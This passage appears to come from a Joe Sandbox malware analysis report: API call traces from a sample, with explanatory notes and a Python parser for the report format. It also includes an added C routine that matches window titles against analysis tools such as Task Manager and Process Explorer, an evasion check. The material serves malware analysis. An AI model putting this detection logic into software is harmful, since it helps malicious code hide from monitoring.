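        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                cur = {"calls": [], "api_id": None}
                blocks.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = CALL_RE.match(line)
            if m:
                d = m.groupdict()
                d["direct"] = d["sub"] is None  # False when reached via a subcall
                cur["calls"].append(d)
        elif section == "Similarity" and line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
    return blocks


def call_chain(block, direct_only=False):
    """Ordered 'Api.MODULE' strings, optionally without the subcall entries."""
    return [f"{c['api']}.{c['mod']}" for c in block["calls"] if c["direct"] or not direct_only]


def api_id_matches(block):
    """True when the recomputed fingerprint equals the printed one; a mismatch
    points to a name prefix missing from STOP_TOKENS."""
    return api_id_from_names([c["api"] for c in block["calls"]]) == block["api_id"]


BLOCKS = parse_blocks(SAMPLE_REPORT)

if __name__ == "__main__":
    for b in BLOCKS:
        print(b["api_id"], api_id_matches(b), " -> ".join(call_chain(b, direct_only=True)))
```

Run over a whole report, parse_blocks lets you search by call chain (every function that calls RegEnumValueW, say) instead of by the report's section headings, and api_id_matches flags any block whose fingerprint the inferred rule cannot reproduce, which is where STOP_TOKENS would need extending.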
APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• BeginPaint.USER32(?,?,?), ref: 000E9241
• GetWindowRect.USER32(?,?), ref: 000E92A5
• ScreenToClient.USER32(?,?), ref: 000E92C2
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000E92D3
• EndPaint.USER32(?,?,?,?,?), ref: 000E9321
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001271EA
  • Part of subcall function 000E9339: BeginPath.GDI32(00000000), ref: 000E9357
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3050599898-0
                                                                                                                                                                                                                                          • Opcode ID: 1017e3b3c97f429409c826baef2ed9bccc90ff09163ee941a4114146554495e1
                                                                                                                                                                                                                                          • Instruction ID: 617acc051347457e4020110deaeacb5e46a16a70762365db6cdc1d0e20c25fe6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1017e3b3c97f429409c826baef2ed9bccc90ff09163ee941a4114146554495e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741BB30104250AFD720DF25DC84FBB7BA8EF46324F100629FAA4972E2C7709895CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0014080C
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00140847
• EnterCriticalSection.KERNEL32(?), ref: 00140863
• LeaveCriticalSection.KERNEL32(?), ref: 001408DC
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001408F3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00140921
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: 4da7b5c45104602c3d73bdd28435667f67d5cea40458e18e146b9992abc70f6c
• Instruction ID: 6fac107bf4662ea0c7a005609b2672bc951a39e3d351abcacfe50816f1fa1005
• Opcode Fuzzy Hash: 4da7b5c45104602c3d73bdd28435667f67d5cea40458e18e146b9992abc70f6c
• Instruction Fuzzy Hash: 7B415C71900205EFDF15EF55DC85AAA7778FF08310F1440A9EE04AA2A7DB70EE65DBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0012F3AB,00000000,?,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 0016824C
• EnableWindow.USER32(?,00000000), ref: 00168272
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 001682D1
• ShowWindow.USER32(?,00000004), ref: 001682E5
• EnableWindow.USER32(?,00000001), ref: 0016830B
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0016832F
Note: 00000004 passed to ShowWindow is SW_SHOWNOACTIVATE, and message 0000130C is TCM_SETCURSEL (TCM_FIRST + 12), i.e. this routine hides one window, shows another without activating it, and selects a tab in a tab control.
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 6823c21565c3bc3a03d1173cb114ee316bf70fe245cfb25d707f8818d8e1ba80
• Instruction ID: 4ca3b21c3c7d7686097c8540699bffe32fd34f9a5e7db9a1543a68ecf3649ab5
• Opcode Fuzzy Hash: 6823c21565c3bc3a03d1173cb114ee316bf70fe245cfb25d707f8818d8e1ba80
• Instruction Fuzzy Hash: 1941C230601644AFDB21CF15CCA9BF57BF1FB0A715F1843ADE5484B2A2CB71A8A1CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 00134C95
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00134CB2
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00134CEA
• _wcslen.LIBCMT ref: 00134D08
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00134D10
• _wcsstr.LIBVCRUNTIME ref: 00134D1A
Note: 0000000E is WM_GETTEXTLENGTH and 0000000D is WM_GETTEXT, so this routine reads the title of a visible window, upper-cases it in place with CharUpperBuffW and runs a substring search over it with _wcsstr. The string it compares against is not recovered in this block (String ID is empty).
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
• Opcode ID: 9578aaff040b31402004872745dae3952a85c13da04b734c656b96b34ab289d1
• Instruction ID: 85989f34ffa79d39a04e2359aa1262a747cb85000c6fa31fc93904f680a4411a
• Opcode Fuzzy Hash: 9578aaff040b31402004872745dae3952a85c13da04b734c656b96b34ab289d1
• Instruction Fuzzy Hash: DF213872204201BBEB155B79EC09EBB7B9CDF55750F108039F805DA292EFA1EC4096A0
Uniqueness

Uniqueness Score: -1.00%
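The window-title routine above reduces to a case-insensitive substring test: fetch the title, upper-case it, search it with _wcsstr. The following is an added example written for this report, not code from the sample or from Joe Sandbox, showing that logic in portable C so it can be run outside Windows. The titles and the match strings are constructed sample data; upper_buf stands in for CharUpperBuffW (assumption: ASCII titles, whereas the real API also folds locale-specific letters), and the title strings stand in for what WM_GETTEXTLENGTH/WM_GETTEXT would return for each visible window.

```c
#include <stddef.h>
#include <wchar.h>
#include <wctype.h>

/* Stand-in for CharUpperBuffW: upper-case 'len' wide characters in place.
   Assumption: ASCII titles; CharUpperBuffW also folds non-ASCII letters. */
static void upper_buf(wchar_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] = (wchar_t)towupper((wint_t)buf[i]);
}

/* Same steps as the recovered routine: _wcslen on the fetched title,
   upper-case the buffer, then _wcsstr against an upper-case needle.
   Returns 1 if 'needle_upper' occurs in 'title' ignoring ASCII case. */
int title_contains(const wchar_t *title, const wchar_t *needle_upper)
{
    wchar_t buf[512];
    size_t cap = sizeof buf / sizeof buf[0];
    size_t len = wcslen(title);
    if (len >= cap)
        len = cap - 1;               /* truncate overly long titles */
    wmemcpy(buf, title, len);
    buf[len] = L'\0';
    upper_buf(buf, len);
    return wcsstr(buf, needle_upper) != NULL;
}

/* Apply the test to a list of titles (what a visible-window enumeration
   would yield) and count how many match at least one needle. */
int count_matching(const wchar_t *const *titles, size_t n_titles,
                   const wchar_t *const *needles, size_t n_needles)
{
    int hits = 0;
    for (size_t i = 0; i < n_titles; i++) {
        for (size_t j = 0; j < n_needles; j++) {
            if (title_contains(titles[i], needles[j])) {
                hits++;
                break;               /* count each window once */
            }
        }
    }
    return hits;
}

/* Constructed sample data (not taken from the analysed sample):
   three window titles and two needles; returns the number of hits. */
int demo_hits(void)
{
    static const wchar_t *const titles[] = {
        L"Task Manager",
        L"Untitled - Notepad",
        L"procexp64"
    };
    static const wchar_t *const needles[] = {
        L"TASK MANAGER",
        L"PROCEXP"
    };
    return count_matching(titles, 3, needles, 2);
}
```

Because the needle is compared after upper-casing, the match is insensitive to how the target application capitalises its title, which is why this pattern is robust for whoever uses it; any defensive check that relies on exact title casing should expect the same.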

APIs
  • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
• _wcslen.LIBCMT ref: 0014587B
• CoInitialize.OLE32(00000000), ref: 00145995
• CoCreateInstance.OLE32(0016FCF8,00000000,00000001,0016FB68,?), ref: 001459AE
• CoUninitialize.OLE32 ref: 001459CC
Note: the CoCreateInstance context argument 00000001 is CLSCTX_INPROC_SERVER; the CLSID and IID are read from the pointers 0016FCF8 and 0016FB68 and are not resolved in this block. GetFullPathNameW is called with a 00007FFF-character output buffer.
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                                                                          • API String ID: 3172280962-24824748
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00130FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00130FCA
  • Part of subcall function 00130FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00130FD6
  • Part of subcall function 00130FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00130FE5
  • Part of subcall function 00130FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00130FEC
  • Part of subcall function 00130FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00131002
• GetLengthSid.ADVAPI32(?,00000000,00131335), ref: 001317AE
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 001317BA
• HeapAlloc.KERNEL32(00000000), ref: 001317C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 001317DA
• GetProcessHeap.KERNEL32(00000000,00000000,00131335), ref: 001317EE
• HeapFree.KERNEL32(00000000), ref: 001317F5
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001314FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00131506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00131515
• CloseHandle.KERNEL32(00000004), ref: 00131520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0013154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00131563
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,000F3379,000F2FE5), ref: 000F3390
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000F339E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F33B7
• SetLastError.KERNEL32(00000000,?,000F3379,000F2FE5), ref: 000F3409
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,00105686,00113CD6,?,00000000,?,00105B6A,?,?,?,?,?,000FE6D1,?,00198A48), ref: 00102D78
• _free.LIBCMT ref: 00102DAB
• _free.LIBCMT ref: 00102DD3
• SetLastError.KERNEL32(00000000,?,?,?,?,000FE6D1,?,00198A48,00000010,000D4F4A,?,?,00000000,00113CD6), ref: 00102DE0
• SetLastError.KERNEL32(00000000,?,?,?,?,000FE6D1,?,00198A48,00000010,000D4F4A,?,?,00000000,00113CD6), ref: 00102DEC
• _abort.LIBCMT ref: 00102DF2
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                          • Opcode ID: a29b4bf8c7cde70e1d7b081f961b08a6df57170f74a83bdbb4637a3b766d29dc
                                                                                                                                                                                                                                          • Instruction ID: 408d929764aadee6984f5f64fbe12b8d625f085b59cd2bac8e71818c822b4ae6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29b4bf8c7cde70e1d7b081f961b08a6df57170f74a83bdbb4637a3b766d29dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF0C83650460067C61237B4BC0EE2A265DBFD27A5F354419F8E4936E2EFF48C4153A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E9693
  • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96A2
  • Part of subcall function 000E9639: BeginPath.GDI32(?), ref: 000E96B9
  • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96E2
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00168A4E
• LineTo.GDI32(?,00000003,00000000), ref: 00168A62
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00168A70
• LineTo.GDI32(?,00000000,00000003), ref: 00168A80
• EndPath.GDI32(?), ref: 00168A90
• StrokePath.GDI32(?), ref: 00168AA0
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 4f5a59870be28bafa749f723a475783d125791d28bf9d164b1eb2ae1716987a0
• Instruction ID: 49902350279f035f1d18b93c7ab999b12071d3addec04ee7a482e80efe7a6682
• Opcode Fuzzy Hash: 4f5a59870be28bafa749f723a475783d125791d28bf9d164b1eb2ae1716987a0
• Instruction Fuzzy Hash: 97110976000108FFDF129F94DC88EAA7F6CEB08394F008012FA599A5A1C7719D95DFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 00135218
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00135229
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00135230
• ReleaseDC.USER32(00000000,00000000), ref: 00135238
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0013524F
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00135261
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 4ba4d41ff29e2327f9f1eedca5eec4a68bc09d62c283611db1f73d269b02f052
• Instruction ID: bf91d8c646cdc608b023ed8594c0cf88923108b0625dce26283d1970227b3287
• Opcode Fuzzy Hash: 4ba4d41ff29e2327f9f1eedca5eec4a68bc09d62c283611db1f73d269b02f052
• Instruction Fuzzy Hash: F5014F76A01718BBEB109BA59C49A5EBFB9EB48751F044066FA45A7681D6B09800CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D1BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 000D1BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D1C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D1C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 000D1C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 000D1C22
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: fece839023fef96f70bb6d957d938be333cfc22ef22fae836388e8f9e0049c53
• Instruction ID: 16ade4774dbe5ac2dacc465f6d4cbf9e51dc8033d108a6348e7a7de42227e54d
• Opcode Fuzzy Hash: fece839023fef96f70bb6d957d938be333cfc22ef22fae836388e8f9e0049c53
• Instruction Fuzzy Hash: C4016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BD15C47A41C7F5A864CBE5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0013EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0013EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 0013EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0013EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0013EB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0013EB75
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                                                                                          • Opcode ID: a31c37176ba444a8b41eaeba7e5b3ad702743af88d0f433017ba90c4fe630518
                                                                                                                                                                                                                                          • Instruction ID: 4b4aa4896ab4134313099524b022305c3783255b5f13ab41e2208b6fea7c96ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a31c37176ba444a8b41eaeba7e5b3ad702743af88d0f433017ba90c4fe630518
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1F01772240168BBE6216B62DC0EEFB7A7CEFCAB11F000158F642D1591A7E05A418AF9
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?), ref: 00127452
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00127469
• GetWindowDC.USER32(?), ref: 00127475
• GetPixel.GDI32(00000000,?,?), ref: 00127484
• ReleaseDC.USER32(?,00000000), ref: 00127496
• GetSysColor.USER32(00000005), ref: 001274B0
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
• Opcode ID: 83c9a57a1de702fe84ef81cc76765174d76de166cb57f4024f2d0226483aed00
• Instruction ID: 98f0895308ce99ae5723b6d7c35101a8b56c0e9cde4cd53f0477c251bd243cb9
• Opcode Fuzzy Hash: 83c9a57a1de702fe84ef81cc76765174d76de166cb57f4024f2d0226483aed00
• Instruction Fuzzy Hash: 05018B31500255EFDB106FA4EC08BFABBB6FF04321F114060F956A25A0CB711E91AB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0013187F
• UnloadUserProfile.USERENV(?,?), ref: 0013188B
• CloseHandle.KERNEL32(?), ref: 00131894
• CloseHandle.KERNEL32(?), ref: 0013189C
• GetProcessHeap.KERNEL32(00000000,?), ref: 001318A5
• HeapFree.KERNEL32(00000000), ref: 001318AC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
